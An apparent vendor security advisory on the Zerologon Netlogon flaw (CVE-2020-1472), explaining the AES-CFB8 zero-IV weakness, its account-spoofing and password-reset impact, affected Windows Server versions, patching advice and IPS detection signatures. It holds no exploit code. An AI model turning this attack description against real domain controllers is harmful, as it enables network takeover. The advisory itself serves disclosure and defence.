The Treasury Department has added four Russian and Ukrainian individuals to its specially designated nationals list, citing attempts by the individuals to interfere in U.S. elections.


In Case You Missed It

Windows Netlogon Elevation of Privilege Vulnerability CVE-2020-1472

An elevation of privilege vulnerability exists when an attacker establishes a vulnerable Netlogon secure channel connection to a domain controller, using the Netlogon Remote Protocol (MS-NRPC). An attacker who successfully exploited the vulnerability could run a specially crafted application on a network device.
This vulnerability also called Zerologon has a CVSS score of 10.

Netlogon Remote Protocol

The Netlogon Remote Protocol is used for secure communication between machines in a domain and domain controllers (DCs) The communication is secured by using a shared session key computed between the client and the DC that is engaged in the secure communication. The session key is computed by using a preconfigured shared secret that is known to the client and the DC. The Microsoft Windows Netlogon Remote Protocol (MS-NRPC) is a core authentication component of Active Directory that provides authentication for user and computer accounts.

Vulnerability (CVE-2020-1472)

The vulnerability arises from a flaw in the cryptographic implementation of the Netlogon protocol, specifically in its usage of AES-CFB8 encryption. MS-NRPC uses an initialization vector (IV) of 0 (zero) in AES-CFB8 mode when authenticating computer accounts.Due to incorrect use of an AES mode of operation it is possible to spoof the identity of any computer account (including that of the DC itself) and set an empty password for that account in the domain.

The successful exploitation of the vulnerability will allow an attacker to

  • Impersonate any computer on the network,
  • Disable security features that protect the Netlogon process
  • Change a computer’s password associated with its Active Directory account.

Affected products

  • Windows Server 2008 R2 for x64-based Systems Service Pack 1
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
  • Windows Server 2012
  • Windows Server 2012 (Server Core installation)
  • Windows Server 2012 R2
  • Windows Server 2012 R2 (Server Core installation)
  • Windows Server 2016
  • Windows Server 2016 (Server Core installation)
  • Windows Server 2019
  • Windows Server 2019 (Server Core installation)
  • Windows Server, version 1903 (Server Core installation)
  • Windows Server, version 1909 (Server Core installation)
  • Windows Server, version 2004 (Server Core installation)

Microsoft has patched this vulnerability and is urging to prioritize patching Domain Controllers, as this is likely the primary target.

SonicWall Capture Labs provides protection against this threat via the following signatures:

  • IPS 15143:Windows Netlogon Elevation of Privilege Vulnerability (CVE-2020-1472)1
  • IPS 15156:Windows Netlogon Elevation of Privilege Vulnerability (CVE-2020-1472) 2
  • IPS 15158:Windows Netlogon Elevation of Privilege Vulnerability (CVE-2020-1472) 3